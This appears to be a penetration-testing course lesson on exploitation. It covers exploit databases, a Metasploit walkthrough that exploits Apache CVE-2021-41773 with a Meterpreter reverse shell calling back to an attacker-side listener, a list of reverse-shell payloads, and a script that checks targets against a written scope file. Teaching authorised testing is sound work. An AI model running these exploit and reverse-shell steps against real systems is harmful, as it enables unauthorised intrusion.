Exploitation is where theory meets practice — you take the vulnerabilities identified during scanning and enumeration and attempt to gain unauthorised access to demonstrate real-world impact. This lesson covers the Metasploit framework, exploit selection, payloads, shells, and post-exploitation basics.
Critical: Exploitation must only be performed on systems you have written authorisation to test. Accidentally exploiting out-of-scope systems can have legal consequences and cause real damage.
```mermaid
graph TD
A["1. Identify vulnerability"] --> B["2. Research exploit (CVE, PoC, etc.)"]
B --> C["3. Select/configure exploit + payload"]
C --> D["4. Execute exploit (verify scope!)"]
D --> E["5. Establish access (shell/session)"]
E --> F["6. Document and move to post-exploitation"]
```
Before writing your own exploits, search existing databases:
| Resource | URL | Description |
|---|---|---|
| Exploit-DB | exploit-db.com | Curated archive of public exploits |
| CVE Details | cvedetails.com | CVE database with CVSS scores |
| NVD | nvd.nist.gov | National Vulnerability Database |
| Packet Storm | packetstormsecurity.com | Security tools and exploits |
| GitHub PoCs | github.com (search CVE-YYYY) | Proof-of-concept repositories |
```shell
# Search Exploit-DB from the command line (Kali)
searchsploit apache 2.4.49
searchsploit -m 50383 # mirror (download) an exploit
```
Metasploit is the most widely used exploitation framework. It provides a structured approach to finding, configuring, and executing exploits.
| Module | Purpose |
|---|---|
| Exploits | Code that triggers the vulnerability |
| Payloads | Code that runs after exploitation |
| Auxiliary | Scanners, fuzzers, brute-forcers |
| Post | Post-exploitation modules |
| Encoders | Obfuscate payloads to evade detection |
```text
# Start the Metasploit console
msfconsole
# Search for an exploit
msf6 > search type:exploit apache
msf6 > search cve:2021-41773
# Select an exploit
msf6 > use exploit/multi/http/apache_normalize_path_rce
# View required options
msf6 exploit(...) > show options
# Set target and payload options
msf6 exploit(...) > set RHOSTS 192.168.1.100
msf6 exploit(...) > set RPORT 443
msf6 exploit(...) > set LHOST 192.168.1.50
msf6 exploit(...) > set LPORT 4444
# Select a payload
msf6 exploit(...) > set PAYLOAD linux/x64/meterpreter/reverse_tcp
# Run the exploit
msf6 exploit(...) > exploit
```
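As an added example (not part of the lesson and not Metasploit's own tooling), a POSIX shell script that enforces the "verify scope!" check from step 4 before the msfconsole steps above are run: it matches the intended RHOSTS against a constructed authorisation file and only then writes the same `use`/`set` commands into a resource script for `msfconsole -r`. The scope-file format, the `/tmp/scoped.rc` path and all function names are assumptions.

```shell
# Constructed example: gate the lesson's msfconsole steps on a written scope file.
# Scope file format (assumed): one IPv4 address or CIDR per line, '#' comments allowed.

ip_to_int() {                       # dotted quad -> 32-bit integer
  old_ifs=$IFS; IFS=.; set -- $1; IFS=$old_ifs
  echo $(( ($1 << 24) | ($2 << 16) | ($3 << 8) | $4 ))
}

in_cidr() {                         # in_cidr IP CIDR -> 0 if IP lies inside CIDR
  net=${2%/*}; bits=${2#*/}
  [ "$bits" = "$2" ] && bits=32     # a bare address means /32
  mask=$(( bits == 0 ? 0 : (4294967295 << (32 - bits)) & 4294967295 ))
  [ $(( $(ip_to_int "$1") & mask )) -eq $(( $(ip_to_int "$net") & mask )) ]
}

in_scope() {                        # in_scope IP SCOPEFILE -> 0 if any entry covers IP
  while read -r entry; do
    case $entry in ''|'#'*) continue ;; esac
    in_cidr "$1" "$entry" && return 0
  done < "$2"
  return 1
}

write_rc() {                        # write_rc RHOST LHOST OUTFILE: the lesson's steps as a resource script
  cat > "$3" <<EOF
use exploit/multi/http/apache_normalize_path_rce
set RHOSTS $1
set RPORT 443
set LHOST $2
set LPORT 4444
set PAYLOAD linux/x64/meterpreter/reverse_tcp
show options
EOF
}

run_scoped() {                      # run_scoped RHOST LHOST SCOPEFILE: refuse before msfconsole starts
  if ! in_scope "$1" "$3"; then
    echo "refusing: $1 is not covered by $3" >&2
    return 2
  fi
  write_rc "$1" "$2" /tmp/scoped.rc
  echo "msfconsole -q -r /tmp/scoped.rc"   # printed, not executed, so the check can be tested offline
}

make_sample_scope() {               # constructed sample authorisation, not a real engagement
  printf '# lab range\n192.168.1.0/24\n10.10.10.5\n' > "$1"
}
```

An out-of-scope target never reaches msfconsole, and the generated resource script doubles as a record of exactly which options were used for the report.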
A payload is the code that executes on the target after successful exploitation.
| Type | Description | Example |
|---|---|---|
| Singles | Self-contained, all in one | linux/x64/exec |
| Stagers | Small initial payload that downloads the stage | windows/x64/meterpreter/reverse_tcp |
| Stages | Downloaded by stager, provides full functionality | Meterpreter, shell |
```text
# List available payloads
msf6 > show payloads
# Filter by platform (msfconsole has a built-in grep command; shell-style pipes are not parsed)
msf6 > grep windows/x64 show payloads
# Common choices:
# windows/x64/meterpreter/reverse_tcp — most feature-rich on Windows
# linux/x64/meterpreter/reverse_tcp — most feature-rich on Linux
# cmd/unix/reverse_bash — simple bash reverse shell
# php/meterpreter/reverse_tcp — for PHP web apps
```